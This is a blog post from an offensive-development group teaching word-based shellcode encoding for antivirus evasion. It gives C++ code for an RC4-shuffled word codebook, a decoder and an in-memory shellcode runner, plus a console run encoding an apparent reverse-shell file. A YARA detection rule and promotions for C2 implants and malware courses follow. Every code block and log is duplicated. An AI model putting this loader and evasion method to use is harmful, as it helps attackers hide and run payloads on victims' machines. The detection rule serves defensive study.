June 9, 2026
Word Based Shellcode Encoding
Welcome to a new Medium post. Today, I’d like to share an interesting technique that allows shellcode to be encoded as a sequence of…
S12 - 0x12Dark Development
10 min read
Welcome to a new Medium post. Today, I'd like to share an interesting technique that allows shellcode to be encoded as a sequence of English words. Similar to the classic shellcode to IPv4 encoding approach, this method transforms shellcode into natural English text instead of relying on IP address representations. The result is a more human readable format
This idea comes from a user on our discord server who just made the code of this concrete post, this is the Github repo:
https://github.com/NirvanaOn/NOW
Anyway, there are a lot of repos doing similar things:
https://github.com/tehstoni/LexiCrypt
https://github.com/wsummerhill/DictionShellcode
Courses: Learn how offensive development works on Windows OS from beginner to advanced taking our courses, all explained in C++.
All Courses Learn how real Windows offensive development works
Technique Database: Access 70+ real offensive techniques with weekly updates, complete with code, PoCs, and AV scan results:
Malware Techniques Database Explore an ever-growing collection of techniques
Modules: Dive deep into essential offensive topics with our modular text-training program! Get a new module every 14 days. Start at just $1.99 per module, or unlock lifetime access to all modules for $100.
0x12 Dark Development Learn the best offensive techniques for Windows OS, with content ranging from beginner to advanced levels. All…
Methodology
To turn raw shellcode bytes into natural-looking English text (and recover them later) we follow five logical steps. Understanding these steps first makes the code much easier to read.
- Build the 256-word codebook: We need exactly 256 unique words (one for each possible byte value (0x00–0xFF)). The user provides a secret sentence; we extract unique words from it. If there are fewer than 256, we pad the list with common English words from a hardcoded pool. The sentence is the key: two operators with different sentences produce completely different codebooks
- Shuffle the codebook with a stream cipher (RC4 or AES-256-CTR): A deterministic shuffle is applied using a password as the cipher key. This maps each position in the word list to a specific byte value in a scrambled order. Without the password, you cannot reconstruct which word maps to which byte. The result is stored in
g_shuffled_opcodes[256] - Encode: replace each shellcode byte with its codeword. We iterate over the shellcode. For each byte value
b, we look upg_byte_to_word[b]and emit the corresponding word. Optionally, connector words (adverbs like however, meanwhile) are injected between codewords to produce natural output - Decode: map words back to bytes: On the decoder side, we tokenize the ciphertext and strip punctuation. For each clean token, we perform a reverse lookup
- Execute the decoded shellcode in memory. We allocate a RW buffer with
VirtualAlloc, copy the decoded bytes into it, flip permissions toPAGE_EXECUTE_READwithVirtualProtect, then kick off a thread viaCreateThread
Implementation
The test file NØW (RC4 - Test).cpp is a self-contained C++ loader. It hardcodes the secret sentence, password, and ciphertext, then decodes and executes the shellcode. Let's break it into the most important parts
RC4 implementation
NØW ships its own RC4, no external crypto dependency. The implementation follows the standard KSA (Key Scheduling Algorithm) and PRGA (Pseudo-Random Generation Algorithm)
typedef struct {
unsigned char S[256];
int i, j;
} RC4_State;
static void rc4_init(RC4_State* rc4, const unsigned char* key, size_t key_len) {
for (int i = 0; i < 256; i++) rc4->S[i] = (unsigned char)i;
int j = 0;
for (int i = 0; i < 256; i++) {
j = (j + rc4->S[i] + key[i % key_len]) % 256;
unsigned char t = rc4->S[i];
rc4->S[i] = rc4->S[j];
rc4->S[j] = t;
}
rc4->i = rc4->j = 0;
}
static unsigned char rc4_byte(RC4_State* rc4) {
rc4->i = (rc4->i + 1) & 0xFF;
rc4->j = (rc4->j + rc4->S[rc4->i]) & 0xFF;
unsigned char t = rc4->S[rc4->i];
rc4->S[rc4->i] = rc4->S[rc4->j];
rc4->S[rc4->j] = t;
return rc4->S[(rc4->S[rc4->i] + rc4->S[rc4->j]) & 0xFF];
}typedef struct {
unsigned char S[256];
int i, j;
} RC4_State;
static void rc4_init(RC4_State* rc4, const unsigned char* key, size_t key_len) {
for (int i = 0; i < 256; i++) rc4->S[i] = (unsigned char)i;
int j = 0;
for (int i = 0; i < 256; i++) {
j = (j + rc4->S[i] + key[i % key_len]) % 256;
unsigned char t = rc4->S[i];
rc4->S[i] = rc4->S[j];
rc4->S[j] = t;
}
rc4->i = rc4->j = 0;
}
static unsigned char rc4_byte(RC4_State* rc4) {
rc4->i = (rc4->i + 1) & 0xFF;
rc4->j = (rc4->j + rc4->S[rc4->i]) & 0xFF;
unsigned char t = rc4->S[rc4->i];
rc4->S[rc4->i] = rc4->S[rc4->j];
rc4->S[rc4->j] = t;
return rc4->S[(rc4->S[rc4->i] + rc4->S[rc4->j]) & 0xFF];
}Building the codebook
init_word_mapping() is the setup function that ties everything together. It extracts unique words from the secret sentence, pads to 256 words, runs the RC4 shuffle to produce the scrambled byte order, then builds both the encode map (g_byte_to_word) and the reverse decode map (g_lookup_words / g_lookup_bytes)
static void generate_shuffled_opcodes(const char* password) {
for (int i = 0; i < 256; i++) g_shuffled_opcodes[i] = (unsigned char)i;
RC4_State rc4;
rc4_init(&rc4, (const unsigned char*)password, strlen(password));
/* Fisher-Yates shuffle driven by the RC4 keystream */
for (int i = 255; i > 0; i--) {
unsigned char ks = rc4_byte(&rc4);
int j = ks % (i + 1);
unsigned char t = g_shuffled_opcodes[i];
g_shuffled_opcodes[i] = g_shuffled_opcodes[j];
g_shuffled_opcodes[j] = t;
}
}
static void create_byte_to_word_map(void) {
for (int pos = 0; pos < 256; pos++) {
unsigned char b = g_shuffled_opcodes[pos];
g_byte_to_word[b] = g_words[pos]; /* byte value → codeword */
}
}static void generate_shuffled_opcodes(const char* password) {
for (int i = 0; i < 256; i++) g_shuffled_opcodes[i] = (unsigned char)i;
RC4_State rc4;
rc4_init(&rc4, (const unsigned char*)password, strlen(password));
/* Fisher-Yates shuffle driven by the RC4 keystream */
for (int i = 255; i > 0; i--) {
unsigned char ks = rc4_byte(&rc4);
int j = ks % (i + 1);
unsigned char t = g_shuffled_opcodes[i];
g_shuffled_opcodes[i] = g_shuffled_opcodes[j];
g_shuffled_opcodes[j] = t;
}
}
static void create_byte_to_word_map(void) {
for (int pos = 0; pos < 256; pos++) {
unsigned char b = g_shuffled_opcodes[pos];
g_byte_to_word[b] = g_words[pos]; /* byte value → codeword */
}
}Decoder
decrypt_shellcode() tokenizes the ciphertext using a broad separator set that includes punctuation and whitespace. Each clean token is checked against the reverse lookup. Noise words (connectors not in the codebook) are silently skipped
static size_t decrypt_shellcode(const char* text, unsigned char** output,
int verbose, DecryptStats* stats) {
char* copy = duplicate_string(text);
size_t out_pos = 0;
char* tok = strtok(copy, TOKEN_SEP); /* TOKEN_SEP = " \t\n\r,.;:!?()[]{}\"'-" */
while (tok) {
char clean[MAX_WORD_LEN];
clean_alpha_token(tok, clean, sizeof(clean)); /* lowercase, strip non alpha */
unsigned char byte_val;
if (lookup_codeword(clean, &byte_val)) {
(*output)[out_pos++] = byte_val; /* codeword matched, emit byte */
} else {
stats->noise_skipped++; /* connector word, silently ignore */
}
tok = strtok(NULL, TOKEN_SEP);
}
stats->bytes_out = out_pos;
return out_pos;
}static size_t decrypt_shellcode(const char* text, unsigned char** output,
int verbose, DecryptStats* stats) {
char* copy = duplicate_string(text);
size_t out_pos = 0;
char* tok = strtok(copy, TOKEN_SEP); /* TOKEN_SEP = " \t\n\r,.;:!?()[]{}\"'-" */
while (tok) {
char clean[MAX_WORD_LEN];
clean_alpha_token(tok, clean, sizeof(clean)); /* lowercase, strip non alpha */
unsigned char byte_val;
if (lookup_codeword(clean, &byte_val)) {
(*output)[out_pos++] = byte_val; /* codeword matched, emit byte */
} else {
stats->noise_skipped++; /* connector word, silently ignore */
}
tok = strtok(NULL, TOKEN_SEP);
}
stats->bytes_out = out_pos;
return out_pos;
}Memory allocation and execution
Once the byte array is reconstructed, execution uses the classic RW to RX two step: allocate with PAGE_READWRITE, copy the bytes, flip to PAGE_EXECUTE_READ with VirtualProtect, then spawn a thread. That's just optional
void* exec_mem = VirtualAlloc(NULL, decoded_len,
MEM_COMMIT | MEM_RESERVE,
PAGE_READWRITE);
memcpy(exec_mem, decoded, decoded_len);
DWORD old_protect = 0;
VirtualProtect(exec_mem, decoded_len, PAGE_EXECUTE_READ, &old_protect);
HANDLE thread = CreateThread(NULL, 0,
(LPTHREAD_START_ROUTINE)exec_mem,
NULL, 0, NULL);
WaitForSingleObject(thread, 5000);
CloseHandle(thread);void* exec_mem = VirtualAlloc(NULL, decoded_len,
MEM_COMMIT | MEM_RESERVE,
PAGE_READWRITE);
memcpy(exec_mem, decoded, decoded_len);
DWORD old_protect = 0;
VirtualProtect(exec_mem, decoded_len, PAGE_EXECUTE_READ, &old_protect);
HANDLE thread = CreateThread(NULL, 0,
(LPTHREAD_START_ROUTINE)exec_mem,
NULL, 0, NULL);
WaitForSingleObject(thread, 5000);
CloseHandle(thread);Code
All the source code can be found on their repo:
https://github.com/NirvanaOn/NOW
Proof of Concept
Main menu:
1. Encrypt shellcode -> words
2. Decrypt words -> shellcode
3. Help
4. Exit
Select [1-4]: 1
--- ENCRYPT SHELLCODE TO WORDS ---
Secret sentence (paste text, blank line twice to finish):
> The old lighthouse keeper had not seen another human face in over seven years, not since the strange fog rolled in from the sea and never left. Every morning he climbed the spiral staircase with a bucket of oil and a prayer on his lips, polishing the great lens until it shone like a dying star. The birds had stopped coming long ago, and the fish had vanished from the waters below, leaving only silence and the constant moan of waves against broken stone. One night he found a bottle washed up on the rocky shore, sealed with red wax and containing a map drawn on leather. The map showed an island that did not exist, marked with a single word written in faded ink: Eden. He laughed at first, thinking it was a prank or a ghost story, but something in his chest ached with a hope he had buried years ago. So he packed a bag with dried meat, fresh water, a compass that spun in circles, and the old revolver his father had used in the war. He stepped into a rowboat as the sun bled orange and purple across the horizon, pushing off without looking back. The fog swallowed him whole, and for three days he saw nothing but gray mist and his own trembling hands. On the fourth morning he woke to the sound of bells ringing softly in the distance, and the air smelled of honey and rain. Before him stood a forest where the trees had silver leaves and the grass sparkled like broken glass. A path of white stones led into the shadows, and at the end of that path waited something he could not name but had always known. He whispered a prayer to no god in particular, took a deep breath, and stepped forward into the impossible.
Password (min 4 chars): 1234
Stream cipher for byte shuffle (must match on decrypt):
1 = RC4 (RC4ENC / RC4DEC compatible)
2 = AES-256-CTR (AESENC / AESDEC compatible, Windows)
Choice [1]: 1
Stream: RC4 | Word pool: 256 | Safe connectors: 50
Output style:
0 = Plain words only (RC4ENC/RC4DEC compatible)
1 = Natural prose (light) - longer sentences, fewer fillers
2 = Natural prose (medium) - balanced paragraphs [default]
3 = Natural prose (heavy) - more connectors and breaks
Choice [2]: 2
Shellcode input: 1=Hex 2=Binary .bin
Choice [1]: 2
Path to .bin: rvshell.bin
Input shellcode: 324 bytes
[+] Round-trip self-test passed (324 bytes verified).
Output file [encrypted_words.txt]: encrypted_words.txt
[+] Saved: encrypted_words.txt (2899 chars)
[+] Format: natural prose (level 2)
--- PREVIEW ---
Or off perhaps first how, similarly how previously, consequently how good swallowed use, led specifically deep. Something now two, likewise this now what elsewhere leaves now, chiefly what! Moreover, rolled now ached stepped work specifically over, silence great meanwhile led see, however with. Therefore, birds hope star revolver that, up indeed broken i?
Well bells nowhere bucket, vanished your what regardless waited now, nevertheless what across perhaps now silence, certainly birds. Additionally, now god so basically get specifically lighthouse three, anywhere bells make washed now did. Up bells meat now elsewhere any, nowhere took lighthouse about, similarly any now it, notably now bells woke led? See with differently broken, previously i well similarly bells bucket alternatively come...Main menu:
1. Encrypt shellcode -> words
2. Decrypt words -> shellcode
3. Help
4. Exit
Select [1-4]: 1
--- ENCRYPT SHELLCODE TO WORDS ---
Secret sentence (paste text, blank line twice to finish):
> The old lighthouse keeper had not seen another human face in over seven years, not since the strange fog rolled in from the sea and never left. Every morning he climbed the spiral staircase with a bucket of oil and a prayer on his lips, polishing the great lens until it shone like a dying star. The birds had stopped coming long ago, and the fish had vanished from the waters below, leaving only silence and the constant moan of waves against broken stone. One night he found a bottle washed up on the rocky shore, sealed with red wax and containing a map drawn on leather. The map showed an island that did not exist, marked with a single word written in faded ink: Eden. He laughed at first, thinking it was a prank or a ghost story, but something in his chest ached with a hope he had buried years ago. So he packed a bag with dried meat, fresh water, a compass that spun in circles, and the old revolver his father had used in the war. He stepped into a rowboat as the sun bled orange and purple across the horizon, pushing off without looking back. The fog swallowed him whole, and for three days he saw nothing but gray mist and his own trembling hands. On the fourth morning he woke to the sound of bells ringing softly in the distance, and the air smelled of honey and rain. Before him stood a forest where the trees had silver leaves and the grass sparkled like broken glass. A path of white stones led into the shadows, and at the end of that path waited something he could not name but had always known. He whispered a prayer to no god in particular, took a deep breath, and stepped forward into the impossible.
Password (min 4 chars): 1234
Stream cipher for byte shuffle (must match on decrypt):
1 = RC4 (RC4ENC / RC4DEC compatible)
2 = AES-256-CTR (AESENC / AESDEC compatible, Windows)
Choice [1]: 1
Stream: RC4 | Word pool: 256 | Safe connectors: 50
Output style:
0 = Plain words only (RC4ENC/RC4DEC compatible)
1 = Natural prose (light) - longer sentences, fewer fillers
2 = Natural prose (medium) - balanced paragraphs [default]
3 = Natural prose (heavy) - more connectors and breaks
Choice [2]: 2
Shellcode input: 1=Hex 2=Binary .bin
Choice [1]: 2
Path to .bin: rvshell.bin
Input shellcode: 324 bytes
[+] Round-trip self-test passed (324 bytes verified).
Output file [encrypted_words.txt]: encrypted_words.txt
[+] Saved: encrypted_words.txt (2899 chars)
[+] Format: natural prose (level 2)
--- PREVIEW ---
Or off perhaps first how, similarly how previously, consequently how good swallowed use, led specifically deep. Something now two, likewise this now what elsewhere leaves now, chiefly what! Moreover, rolled now ached stepped work specifically over, silence great meanwhile led see, however with. Therefore, birds hope star revolver that, up indeed broken i?
Well bells nowhere bucket, vanished your what regardless waited now, nevertheless what across perhaps now silence, certainly birds. Additionally, now god so basically get specifically lighthouse three, anywhere bells make washed now did. Up bells meat now elsewhere any, nowhere took lighthouse about, similarly any now it, notably now bells woke led? See with differently broken, previously i well similarly bells bucket alternatively come...We build custom C2 agents and implants for red teams, giving full control professional operations.
Custom Agents — 0x12 Dark Development Custom C2 Agents Built for the Real World. Command & Control agents compatible with Mythic, Havoc and leading…
Detection
0x12DarkSandbox
Test your own payloads against the same stack with a free scan on sign up, or go deeper with a scan pack or monthly plan
Upload & Scan Upload malware samples for parallel analysis across isolated Windows VMs with multi-engine AV scanning
In this case, the .exe is interactive, so we can just scan for the static analysis.
Capabilities
delay execution
create or open file
allocate memory
allocate or change RWX memory
create thread
change memory protection
allocate or change RW memory
contain loop
hash data via WinCrypt
initialize hashing via WinCrypt
read file on Windows
write file on Windows
spawn thread to RWX shellcode
execute shellcode via indirect call
get thread local storage value
enumerate PE sections
contain a thread local storage (.tls) section
Defense Evasion
create new key via CryptAcquireContext
encrypt or decrypt via WinCrypt
encrypt data using AES via WinAPI
Execution
parse PE headerdelay execution
create or open file
allocate memory
allocate or change RWX memory
create thread
change memory protection
allocate or change RW memory
contain loop
hash data via WinCrypt
initialize hashing via WinCrypt
read file on Windows
write file on Windows
spawn thread to RWX shellcode
execute shellcode via indirect call
get thread local storage value
enumerate PE sections
contain a thread local storage (.tls) section
Defense Evasion
create new key via CryptAcquireContext
encrypt or decrypt via WinCrypt
encrypt data using AES via WinAPI
Execution
parse PE headerYARA
Here a YARA rule to detect this technique:
/*
Rule : WordShellcodeDecoder_Generic
Author : 0x12 Dark Development
Description:
Detects binary loaders that implement a word-based shellcode decoding scheme.
The technique maps English words to byte values through a 256-entry lookup
table, tokenizes a plaintext payload using punctuation/whitespace separators,
and reconstructs raw shellcode byte-by-byte from the token stream.
Rule is intentionally generic and does not target any specific tool.
Reference: https://github.com/NirvanaOn/NOW
https://github.com/tehstoni/LexiCrypt
https://github.com/wsummerhill/DictionShellcode
*/
rule WordShellcodeDecoder_Generic {
meta:
author = "0x12 Dark Development"
description = "Detects binary loaders using a word-to-byte mapping table to decode shellcode from natural language text"
category = "evasion, encoding, shellcode-delivery"
technique = "T1027.013 - Obfuscated Files or Information: Encrypted/Encoded File"
severity = "high"
date = "2025-08-01"
strings:
/*
* Separator sets used by tokenizers.
* The common denominator across all implementations is whitespace +
* the basic sentence punctuation set. We match several ordering variants.
*/
$sep_full = " \t\n\r,.;:!?()[]{}\"'-" ascii wide
$sep_min = " \t\n\r,.;:!?" ascii wide
$sep_ws_pun = " .,;:!?\t\n" ascii wide
/*
* Canonical RC4 KSA initialisation pattern (inline, not imported).
* Byte sequence: for(i=0;i<256;i++) S[i]=i
* Compiled as: xor eax,eax / mov [base+rax], al / inc eax / cmp eax,100h
* This 6-byte sequence is highly characteristic and rarely a false positive.
*/
$rc4_ksa = { 31 C0 88 04 08 FF C0 3D 00 01 00 00 }
/*
* RC4 PRGA inner loop — swap + keystream output.
* Matches the two-swap + index add pattern regardless of register allocation.
*/
$rc4_prga = { 8A ?? ?? 86 ?? ?? 88 ?? ?? 03 ?? ?? 8A ?? ?? }
/*
* Fisher-Yates shuffle driven by a keystream byte.
* Pattern: ks % (i+1) followed by a swap of two array elements.
* Captured as: movzx + idiv/imul + xchg sequence (32-bit variant).
*/
$fy_shuffle = { 0F B6 ?? F7 ?? 8B ?? 87 ?? }
/*
* Byte accumulation loop pattern: result of lookup written into
* a growing output buffer indexed by a counter.
* mov [buf + counter], al (general form, tolerates base-reg variation)
*/
$accum_byte = { 88 04 ?? 48 FF C? }
/*
* isalpha / tolower pipeline — used to clean tokens before lookup.
* Nearly all implementations normalise tokens to lowercase alpha-only.
* Inline pattern: call isalpha followed closely by call tolower.
*/
$clean_tok = { FF 15 ?? ?? ?? ?? 85 C0 74 ?? FF 15 ?? ?? ?? ?? }
/*
* strtok import name — present in any MSVC/MinGW build that does
* not hand-roll the tokenizer.
*/
$strtok_imp = "strtok" ascii nocase
/*
* Padding pool — natural English words that appear in word-pool arrays.
* Any two from this set appearing close together inside a binary
* (not in a normal string table) is a strong signal of a codebook.
*/
$pool_w1 = "however" ascii fullword
$pool_w2 = "therefore" ascii fullword
$pool_w3 = "moreover" ascii fullword
$pool_w4 = "furthermore" ascii fullword
$pool_w5 = "nevertheless" ascii fullword
$pool_w6 = "consequently" ascii fullword
$pool_w7 = "alternatively" ascii fullword
$pool_w8 = "additionally" ascii fullword
$pool_w9 = "particularly" ascii fullword
$pool_w10 = "subsequently" ascii fullword
condition:
/* PE or raw binary */
(
uint16(0) == 0x5A4D /* MZ header */
or uint32(0) == 0x464C457F /* ELF header */
)
and filesize < 10MB
/* Core decoder fingerprint:
separator string + token accumulation + import or inline tokenizer */
and (
($sep_full or $sep_min or $sep_ws_pun)
and $accum_byte
and ($strtok_imp or $clean_tok)
)
/* Cipher layer — inline RC4 KSA or PRGA, or the Fisher-Yates shuffle */
and (
$rc4_ksa or $rc4_prga or $fy_shuffle
)
/* Codebook presence:
4 or more connector/padding words clustered inside the binary.
These only appear together in files that embed a 256-word pool. */
and (
4 of ($pool_w*)
)
}/*
Rule : WordShellcodeDecoder_Generic
Author : 0x12 Dark Development
Description:
Detects binary loaders that implement a word-based shellcode decoding scheme.
The technique maps English words to byte values through a 256-entry lookup
table, tokenizes a plaintext payload using punctuation/whitespace separators,
and reconstructs raw shellcode byte-by-byte from the token stream.
Rule is intentionally generic and does not target any specific tool.
Reference: https://github.com/NirvanaOn/NOW
https://github.com/tehstoni/LexiCrypt
https://github.com/wsummerhill/DictionShellcode
*/
rule WordShellcodeDecoder_Generic {
meta:
author = "0x12 Dark Development"
description = "Detects binary loaders using a word-to-byte mapping table to decode shellcode from natural language text"
category = "evasion, encoding, shellcode-delivery"
technique = "T1027.013 - Obfuscated Files or Information: Encrypted/Encoded File"
severity = "high"
date = "2025-08-01"
strings:
/*
* Separator sets used by tokenizers.
* The common denominator across all implementations is whitespace +
* the basic sentence punctuation set. We match several ordering variants.
*/
$sep_full = " \t\n\r,.;:!?()[]{}\"'-" ascii wide
$sep_min = " \t\n\r,.;:!?" ascii wide
$sep_ws_pun = " .,;:!?\t\n" ascii wide
/*
* Canonical RC4 KSA initialisation pattern (inline, not imported).
* Byte sequence: for(i=0;i<256;i++) S[i]=i
* Compiled as: xor eax,eax / mov [base+rax], al / inc eax / cmp eax,100h
* This 6-byte sequence is highly characteristic and rarely a false positive.
*/
$rc4_ksa = { 31 C0 88 04 08 FF C0 3D 00 01 00 00 }
/*
* RC4 PRGA inner loop — swap + keystream output.
* Matches the two-swap + index add pattern regardless of register allocation.
*/
$rc4_prga = { 8A ?? ?? 86 ?? ?? 88 ?? ?? 03 ?? ?? 8A ?? ?? }
/*
* Fisher-Yates shuffle driven by a keystream byte.
* Pattern: ks % (i+1) followed by a swap of two array elements.
* Captured as: movzx + idiv/imul + xchg sequence (32-bit variant).
*/
$fy_shuffle = { 0F B6 ?? F7 ?? 8B ?? 87 ?? }
/*
* Byte accumulation loop pattern: result of lookup written into
* a growing output buffer indexed by a counter.
* mov [buf + counter], al (general form, tolerates base-reg variation)
*/
$accum_byte = { 88 04 ?? 48 FF C? }
/*
* isalpha / tolower pipeline — used to clean tokens before lookup.
* Nearly all implementations normalise tokens to lowercase alpha-only.
* Inline pattern: call isalpha followed closely by call tolower.
*/
$clean_tok = { FF 15 ?? ?? ?? ?? 85 C0 74 ?? FF 15 ?? ?? ?? ?? }
/*
* strtok import name — present in any MSVC/MinGW build that does
* not hand-roll the tokenizer.
*/
$strtok_imp = "strtok" ascii nocase
/*
* Padding pool — natural English words that appear in word-pool arrays.
* Any two from this set appearing close together inside a binary
* (not in a normal string table) is a strong signal of a codebook.
*/
$pool_w1 = "however" ascii fullword
$pool_w2 = "therefore" ascii fullword
$pool_w3 = "moreover" ascii fullword
$pool_w4 = "furthermore" ascii fullword
$pool_w5 = "nevertheless" ascii fullword
$pool_w6 = "consequently" ascii fullword
$pool_w7 = "alternatively" ascii fullword
$pool_w8 = "additionally" ascii fullword
$pool_w9 = "particularly" ascii fullword
$pool_w10 = "subsequently" ascii fullword
condition:
/* PE or raw binary */
(
uint16(0) == 0x5A4D /* MZ header */
or uint32(0) == 0x464C457F /* ELF header */
)
and filesize < 10MB
/* Core decoder fingerprint:
separator string + token accumulation + import or inline tokenizer */
and (
($sep_full or $sep_min or $sep_ws_pun)
and $accum_byte
and ($strtok_imp or $clean_tok)
)
/* Cipher layer — inline RC4 KSA or PRGA, or the Fisher-Yates shuffle */
and (
$rc4_ksa or $rc4_prga or $fy_shuffle
)
/* Codebook presence:
4 or more connector/padding words clustered inside the binary.
These only appear together in files that embed a 256-word pool. */
and (
4 of ($pool_w*)
)
}Here you have my collection of YARA rules:
GitHub — S12cybersecurity/YaraRules: Collection of interesting Yara Rules Collection of interesting Yara Rules. Contribute to S12cybersecurity/YaraRules development by creating an account on…
Conclusions
Word-based shellcode encoding is a simple idea with a real practical impact. It does not break cryptography or exploit kernel vulnerabilities, it just changes what the payload looks like at rest, and that is often enough to slip past a first layer of detection
📌 Follow me: YouTube | 🐦 X | 💬 Discord Server | 📸 Instagram | Newsletter
S12.